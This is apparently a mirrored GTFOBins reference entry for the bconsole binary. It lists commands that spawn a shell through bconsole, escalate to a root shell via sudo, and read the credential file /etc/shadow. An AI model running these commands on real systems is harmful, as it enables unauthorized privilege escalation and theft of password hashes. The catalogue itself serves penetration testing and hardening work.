mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 07:49:17 +01:00
170c1f5db7
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
15 lines
358 B
Markdown
15 lines
358 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: |
|
|
bconsole
|
|
@exec /bin/sh
|
|
sudo:
|
|
- code: |
|
|
sudo bconsole
|
|
@exec /bin/sh
|
|
file-read:
|
|
- description: The file is actually parsed and the first wrong line is returned in an error message, thus it may not be suitable for reading arbitrary files.
|
|
code: bconsole -c /etc/shadow
|
|
---
|